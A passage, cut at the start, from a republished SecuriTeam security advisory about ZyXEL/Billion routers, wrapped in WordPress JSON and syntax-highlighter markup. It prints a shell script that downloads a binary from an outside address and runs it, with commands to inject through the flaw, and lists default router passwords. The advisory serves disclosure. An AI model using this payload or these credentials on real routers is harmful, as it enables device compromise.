class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/bin\/sh  wget -q -O \/tmp\/b http:\/\/10.13.37.1\/b  chmod +x \/tmp\/b  \/tmp\/b<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825274102328914-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825274102328914-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825274102328914-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825274102328914-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825274102328914-1\"><span class=\"crayon-p\">#!\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825274102328914-2\"><span class=\"crayon-v\">wget<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">O<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span 
class=\"crayon-i\">b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/10.13.37.1\/b<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825274102328914-3\"><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825274102328914-4\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>Then inject the following commands:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825276954208676\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" 
title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> chmod +x \/tmp\/a  \/tmp\/a<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825276954208676-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825276954208676-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825276954208676-1\"><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-58867eb825276954208676-2\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p><strong>Default accounts &#8211; P660HN-T v2 router<\/strong><\/p>\n<ol>\n<li>username: admin; password: password<\/li>\n<li>username: true; password: true<\/li>\n<li>username: supervisor; password: zyad1234<\/li>\n<\/ol>\n<p><strong>Vendor Response<\/strong><br \/> We notified ZyXEL of the vulnerabilities back in July 2016; repeated attempts to re-establish contact and get some answer on the status of the patches for these vulnerabilities went unanswered. At this time there is no solution or workaround for these vulnerabilities.<\/p>\n<p>Edit: In January 2017, ZyXEL contacted us and corrected us: they are not the manufacturer of Billion routers.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2910\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following advisory describes four (4) vulnerabilities and default accounts \/ passwords in ZyXEL \/ Billion customized routers. TrueOnline is a major Internet Service Provider in Thailand that provides customized versions of routers to its customers, free of charge. 
The routers are manufactured by ZyXEL and Billion runs a special Linux distribution called &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2910\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; ZyXEL \/ Billion Multiple Vulnerabilities<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6273","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6273","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6273"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6273\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6273"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6273"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}